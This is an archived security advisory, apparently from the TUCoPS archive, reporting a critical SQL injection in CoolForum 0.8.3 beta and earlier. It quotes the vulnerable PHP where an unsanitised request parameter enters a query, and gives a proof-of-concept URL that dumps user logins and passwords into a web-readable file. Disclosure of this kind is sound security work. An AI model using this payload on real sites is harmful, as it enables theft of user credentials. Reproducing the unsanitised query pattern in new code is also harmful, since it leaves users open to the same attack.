TUCoPS :: Web BBS :: etc :: b06-2684.htm

Critical SQL Injection in CoolForum
Critical SQL Injection in CoolForum
Critical SQL Injection in CoolForum



Type: SQL Injection=0D
Risk: Critical=0D
Product: CoolForum <= 0.8.3 beta=0D
********************************=0D
=0D
=0D
Vulnerability=0D
*************=0D
// File: editpost.php=0D
// Line 38=0D
//=0D
if(isset($_REQUEST['post'])) $post = intval($_REQUEST['post']);=0D
else $post = 0;=0D
--=0D
// Line 77=0D
//=0D
$canedit = getrightedit($_REQUEST['post'],$_REQUEST['forumid']);=0D
--=0D
// File: admin/functions.php=0D
// Line 623=0D
//=0D
function getrightedit($idpost,$forumid)=0D
{=0D
global $_MODORIGHTS, $sql, $_USER, $_FORUMCFG, $_PRE, $_GENERAL, $_PERMFORUM;=0D
$query = $sql->query("SELECT idforum,idmembre,parent FROM ".$_PRE."posts WHERE idpost=".$idpost);=0D
$j = mysql_fetch_array($query);=0D
--=0D
=0D
=0D
Proof Of Concept=0D
****************=0D
http://[...]/editpost.php?forumid=1&post=3 UNION SELECT userid,login,password FROM cf_user INTO OUTFILE '/www/web/resultat.txt'%23&parent=1&p=1=0D 
=0D
=0D
Credits=0D
*******=0D
Ref : http://mgsdl.free.fr/advisories/coolforum083ba.txt=0D 
Note: Others SQL Injection exists but they are difficult to exploit=0D
by DarkFig

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH